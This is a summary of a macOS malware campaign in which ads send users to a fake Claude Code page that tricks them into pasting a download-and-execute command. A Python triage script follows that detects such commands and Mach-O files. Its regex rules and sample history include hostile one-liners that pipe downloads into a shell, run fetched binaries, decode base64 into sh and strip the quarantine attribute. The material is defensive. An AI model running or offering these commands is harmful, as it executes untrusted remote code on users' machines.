This report details a malware campaign that targets macOS users through malicious Google Search ads. Victims are sent to a fake Claude Code download page that uses the "ClickFix" social-engineering tactic: the page instructs the user to paste a command into the terminal, and that command downloads a Mach-O payload from a remote server and executes it.
The infection involves network communication with a C2 server and several suspicious domains registered shortly before the attack. The technical indicators provided include file hashes, the specific download URLs, and network traffic captures documenting the payload delivery and the C2 interaction.
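The two host-side artefacts the summary describes are a pasted download-and-execute one-liner and a Mach-O file dropped by it. The following is an added example, not code or indicators from the report: a small Python triage helper that flags ClickFix-style shell commands in a constructed shell-history sample (download piped into a shell, download followed by `chmod +x` and execution, base64-decoded commands piped into a shell, and removal of the macOS quarantine attribute, a general macOS heuristic that the report does not mention) and that identifies a downloaded file as Mach-O from its magic bytes. The domains in the sample history (`claude-code-download.example`, `cdn.example.net`) and the byte strings are constructed for the example; the campaign's real URLs and hashes are in the report's indicator list and are not reproduced here.

```python
import re
from typing import Dict, List, Optional

# Heuristic rules for ClickFix-style "paste this into your terminal" commands.
# These are the example's own patterns, not signatures taken from the report.
RULES = [
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("download then chmod +x then execute",
     re.compile(r"\b(curl|wget)\b.*chmod\s+\+x\s+(\S+).*(?:;|&&|\|\|)\s*(?:sudo\s+)?\2(?:\s|$)")),
    ("base64 decode piped to shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    # Gatekeeper quarantine removal is a common macOS step; assumption, not from the report.
    ("quarantine attribute removed",
     re.compile(r"\bxattr\b.*(?:com\.apple\.quarantine|\s-c\b)")),
]


def scan_history(lines: List[str]) -> List[Dict]:
    """Return the history entries (1-based line numbers) that match any rule."""
    hits = []
    for line_no, cmd in enumerate(lines, start=1):
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        if reasons:
            hits.append({"line_no": line_no, "command": cmd, "reasons": reasons})
    return hits


# Mach-O header magics (thin images, both byte orders).
THIN_MAGICS = {
    b"\xfe\xed\xfa\xce": "MH_MAGIC (32-bit big-endian Mach-O)",
    b"\xce\xfa\xed\xfe": "MH_CIGAM (32-bit little-endian Mach-O)",
    b"\xfe\xed\xfa\xcf": "MH_MAGIC_64 (64-bit big-endian Mach-O)",
    b"\xcf\xfa\xed\xfe": "MH_CIGAM_64 (64-bit little-endian Mach-O)",
}
# Universal (fat) binaries: magic followed by nfat_arch in the same byte order.
FAT_MAGICS = {
    b"\xca\xfe\xba\xbe": ("FAT_MAGIC", "big"),
    b"\xbe\xba\xfe\xca": ("FAT_CIGAM", "little"),
}


def macho_kind(data: bytes) -> Optional[str]:
    """Classify a file's leading bytes as a Mach-O image, or None if they are not."""
    magic = data[:4]
    if magic in THIN_MAGICS:
        return THIN_MAGICS[magic]
    if magic in FAT_MAGICS and len(data) >= 8:
        name, order = FAT_MAGICS[magic]
        nfat = int.from_bytes(data[4:8], order)
        # CAFEBABE is also the Java class-file magic, where bytes 4..7 hold the
        # class version (e.g. 0x34 = 52). A real fat header has a small arch
        # count and room for one 20-byte fat_arch record per entry.
        if 1 <= nfat <= 16 and len(data) >= 8 + 20 * nfat:
            return f"{name} (universal Mach-O, {nfat} architectures)"
    return None


# Constructed shell-history sample: benign entries mixed with ClickFix-style ones.
SAMPLE_HISTORY = [
    "brew install jq",
    "curl -O https://example.com/release/notes.pdf",
    "curl -fsSL https://claude-code-download.example/install.sh | bash",
    "curl -s -o /tmp/.update https://cdn.example.net/x && chmod +x /tmp/.update && /tmp/.update",
    "echo aGVsbG8= | base64 -d | sh",
    "xattr -d com.apple.quarantine ~/Downloads/installer",
    "git pull && make",
]

# Constructed byte strings standing in for the first bytes of downloaded files.
SAMPLE_FILES = {
    "thin_arm64_style": b"\xcf\xfa\xed\xfe" + b"\x00" * 28,
    "universal": b"\xca\xfe\xba\xbe\x00\x00\x00\x02" + b"\x00" * 40,
    "java_class": b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"\x00" * 40,
    "shell_script": b"#!/bin/bash\necho hi\n",
}

if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit['line_no']}: {', '.join(hit['reasons'])}\n    {hit['command']}")
    for label, blob in SAMPLE_FILES.items():
        print(f"{label}: {macho_kind(blob) or 'not Mach-O'}")
```

On a real host the history input would come from `~/.zsh_history` or `~/.bash_history` (zsh extended history prefixes each entry with `: <epoch>:<duration>;`, which the rules tolerate because they search rather than anchor), and the magic check would be run over files in `/tmp`, `~/Downloads` and any path named in a flagged command.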